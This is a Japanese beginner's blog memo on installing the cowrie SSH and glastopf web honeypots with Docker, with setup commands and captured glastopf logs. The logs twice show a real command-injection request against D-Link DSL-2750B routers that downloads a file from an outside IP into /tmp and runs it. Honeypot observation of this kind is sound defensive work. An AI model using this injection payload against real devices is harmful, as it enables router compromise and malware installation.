初心者
セキュリティ

ハニーポッド設置してみた

長期休みがあったので、
ハニーポッド観察記録という本をちょっと読みまして、
ひとまず設置してみただけの自分用メモ。
昔から設置したくて仕方なかった。
cowrie、glastopfを入れました。
設置時間コマンド叩いてる時間は10分もかかってないです。docker便利です。

これから監視していきたいです。

docker

そもそもdocker入れる

sudo apt-get update
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    software-properties-common \
    emacs
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"

Docker Community Edition

ceも入れる

sudo apt-get update; sudo apt-get install docker-ce

cowrie

ssh専用のハニーポッド設置

https://github.com/micheloosterhof/cowrie

docker pull cowrie/cowrie
bin/cowrie start

動いてるか確認

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

ログを見る
設置したばっかで、まだないけど。

ログのコピー例
docker cp 54f219cb579c:/etc/hoge.txt hoge.txt
ログの部分
/cowrie/cowrie-git/log

dockerに入る例
docker exec -it 54f219cb579c /bin/bash

Ctrl+dでデタッチ

glastopf

web用のハニーポッド設置

git clone https://github.com/mushorg/glastopf.git
cd glastopf
docker build --rm --tag glastopf .
mkdir myhoneypot1
docker run --detach --publish 80:80 --volume myhoneypot1:/opt/myhoneypot glastopf

動いてるか確認

docker ps -a

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2798c8515bf7        glastopf            "glastopf-runner"        3 minutes ago       Up 3 minutes        0.0.0.0:80->80/tcp   relaxed_kilby
54f219cb579c        3563dedc36b9        "/cowrie/cowrie-git/…"   41 minutes ago      Up 33 minutes       2222-2223/tcp        musing_ptolemy

ログを見るときの例

dockerに入る例
docker exec -it 2798c8515bf7 /bin/bash

Ctrl+dでデタッチ

感染例

IOT機器のマルウェア

D-Linkのルータ「DSL-2750B」って機器に感染するものらしい。

log/glastopf.log.2018-08-15
2018-08-15 21:20:42,441 (glastopf.glastopf) 197.33.83.159 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 21:20:42,984 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 22:51:43,588 (glastopf.glastopf) 179.98.9.15 requested GET / on 2798c8515bf7:80
2018-08-15 22:53:18,342 (glastopf.glastopf) 177.11.140.205 requested GET / on 2798c8515bf7:80
2018-08-15 23:03:47,697 (glastopf.glastopf) 190.186.100.246 requested GET / on 2798c8515bf7:80
2018-08-15 23:33:58,562 (glastopf.glastopf) 41.37.152.8 requested GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ on 2798c8515bf7:80
2018-08-15 23:33:59,107 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 400: Bad Request
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 400: Bad Request
2018-08-15 23:53:57,893 (glastopf.glastopf) 117.50.7.159 requested GET / on 2798c8515bf7:80

https://www.cscloud.co.jp/news/press/201806251426/
http://octahedron.hatenablog.jp/entry/2018/07/25/005946
http://www.itmedia.co.jp/enterprise/articles/1806/21/news055.html

ああ

sftp-config.json